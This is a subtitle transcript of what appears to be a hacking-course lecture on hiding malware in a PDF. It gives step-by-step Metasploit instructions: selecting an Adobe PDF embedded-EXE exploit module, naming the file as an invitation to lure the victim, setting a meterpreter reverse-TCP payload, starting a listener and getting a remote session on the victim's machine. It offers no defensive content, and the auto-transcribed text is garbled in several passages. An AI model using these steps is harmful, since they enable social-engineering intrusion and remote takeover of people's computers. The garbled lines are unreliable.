1 00:00:10,050 --> 00:00:12,840 Welcome. In the previous lecture we saw
2 00:00:13,020 --> 00:00:20,140 how black hat hackers hide their payload in order to get files to hack their devices.
3 00:00:21,310 --> 00:00:31,050 So in this lecture we are going to see how to hide malware in a normal PDF file. As you know, PDF
4 00:00:31,140 --> 00:00:34,880 has become really common in everyday work.
5 00:00:35,010 --> 00:00:39,880 It's hard to imagine business proposals without PDFs.
6 00:00:40,030 --> 00:00:49,200 The format is used in almost all companies to share business deals, company brochures and even invitations.
7 00:00:50,430 --> 00:00:51,310 Previous years
8 00:00:51,430 --> 00:00:56,430 were not good for the users, as several vulnerabilities
9 00:00:56,430 --> 00:01:05,220 were published, such as a buffer overflow vulnerability in versions prior to version nine. A lot of the
10 00:01:05,220 --> 00:01:12,970 attacks were observed trying to abuse the bug by using social engineering or by hosting malicious
11 00:01:13,320 --> 00:01:22,640 files on the Internet. Just the simple act of opening the PDF file would exploit a vulnerability to automatically
12 00:01:22,660 --> 00:01:30,440 download malicious code from the internet and display a decoy file to trick you into believing that
13 00:01:30,800 --> 00:01:32,400 nothing wrong was happening.
14 00:01:34,020 --> 00:01:42,800 As against the injured the percentage of this bag using creating you are already a. So let's see how
15 00:01:42,800 --> 00:01:44,280 to do this.
16 00:01:44,280 --> 00:01:54,830 Here we are using the Metasploit framework to create a malicious PDF file. So open terminal and
17 00:01:54,960 --> 00:02:00,890 type msfconsole to start Metasploit.
18 00:02:01,060 --> 00:02:11,680 Next we are going to use adobe underscore pdf underscore embedded underscore exe underscore
19 00:02:12,270 --> 00:02:19,450 no js exploit module. It will create our malicious PDF file. It is a modified version of the
20 00:02:20,110 --> 00:02:25,610 adobe pdf embedded exe social engineering.
21 00:02:25,620 --> 00:02:34,450 This version does not require JavaScript to be enabled and does not require the EXE to be attached to the PDF.
22 00:02:34,450 --> 00:02:40,950 The EXE is embedded in the PDF in a non-standard method
23 00:02:41,070 --> 00:02:56,670 using hex encoding. So type use exploit slash windows slash fileformat slash adobe underscore pdf
24 00:02:57,090 --> 00:03:04,710 underscore embedded underscore exe underscore no javascript.
25 00:03:04,740 --> 00:03:07,620 Now let's see the options of this tool.
26 00:03:07,960 --> 00:03:18,120 Type show options. As you can see, the default names of our payload and PDF file.
27 00:03:18,310 --> 00:03:24,890 If you want to give a different name to your PDF file, type set filename.
28 00:03:25,120 --> 00:03:28,820 Now enter the name which you want to give here.
29 00:03:28,860 --> 00:03:35,280 How you an invitation. Next we need to set the type of payload
30 00:03:35,310 --> 00:03:37,200 we are going to use.
31 00:03:37,430 --> 00:03:48,910 So here we are using windows slash meterpreter slash reverse underscore tcp. Now and the local would
32 00:03:49,100 --> 00:03:51,850 be done on the machine.
33 00:03:52,700 --> 00:04:02,960 Similarly to state local port number on which the connection is dual use and for machine I said and
34 00:04:03,000 --> 00:04:15,510 put it in. Next type exploit to create your malicious PDF file. As you can see, our file is created
35 00:04:16,110 --> 00:04:19,000 and stored in the dot msf4 folder.
36 00:04:20,400 --> 00:04:28,760 Now to see our PDF file, go to the dot msf4 local folder.
37 00:04:28,870 --> 00:04:35,480 Here is our malicious PDF file. Next we need to create a handler to listen
38 00:04:35,500 --> 00:04:37,680 for the reverse connection.
39 00:04:37,720 --> 00:04:43,320 So back to the terminal and type back.
40 00:04:43,540 --> 00:04:57,870 Now to that handler I use these live handler. Now to set your payload, type set payload windows slash
41 00:04:58,120 --> 00:05:08,950 meterpreter slash underscore tcp. Similarly to set lhost and lport police and on with him.
42 00:05:09,320 --> 00:05:16,910 I said I'll host one and do not 168 43 dog to say one.
43 00:05:17,290 --> 00:05:28,600 Now to set lport I said and put it in a. Now type run or exploit to start a listener.
44 00:05:28,930 --> 00:05:32,550 Now we are ready to listen for an incoming connection.
45 00:05:34,340 --> 00:05:39,250 Here you can see I sent my malicious PDF file to the machine.
46 00:05:40,200 --> 00:05:42,220 Now let's try to open this.
47 00:05:45,170 --> 00:05:47,980 against the easy exit.
48 00:05:47,990 --> 00:05:54,500 Did we take the and we got a meterpreter session in our.
49 00:05:56,300 --> 00:06:00,310 Now from here we can control over war machine.
50 00:06:01,650 --> 00:06:11,310 So that's how the hackers hide malware in normal PDF files to hack their machines. Thanks.